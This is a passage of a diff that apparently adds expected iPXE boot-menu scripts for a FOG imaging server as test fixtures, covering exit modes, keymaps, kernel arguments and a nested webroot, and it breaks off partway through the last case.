+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-grub-first-cdrom ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/grub.exe --config-file="cdrom --init;map --hook;root (cd0);chainloader (cd0)"" || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-grub-first-found-windows ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+chain -ar ${boot-url}/service/ipxe/grub.exe --config-file="find --set-root /BOOTMGR;chainloader /BOOTMGR"" || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-refind-efi ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+item fog.secureboot Enroll Secure Boot Key
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+imgfetch ${boot-url}/service/ipxe/refind.conf
+chain -ar ${boot-url}/service/ipxe/refind_x64.efi || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:fog.secureboot
+echo Secure Boot signing is not configured on this FOG server.
+echo Nothing to enroll -- returning to the menu...
+sleep 5
+goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## exit-unknown-falls-back-to-sanboot ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## host-exit-override ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0x00567a 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is registered as testhost!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.keyreg Update Product Key
+item fog.deployimage Deploy Image
+item fog.multijoin Join Multicast Session
+item fog.quickdel Quick Host Deletion
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+reboot || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.keyreg
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param keyreg 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.deployimage
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param qihost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.quickdel
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param delhost 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## no-menu ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82
+
+########## keymap-set ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap uk
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=uk web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=uk web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=uk web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## keymap-norwegian ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap no-latin1
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=no-latin1 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=no-latin1 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=no-latin1 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## keymap-serbian ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap sr-latin
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=sr web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=sr web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 keymap=sr web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## kernel-args-and-debug ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0 debug rootfstype=ext4 acpi=off storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0 debug rootfstype=ext4 acpi=off storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0 debug rootfstype=ext4 acpi=off storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## nested-webroot ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot apps/fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
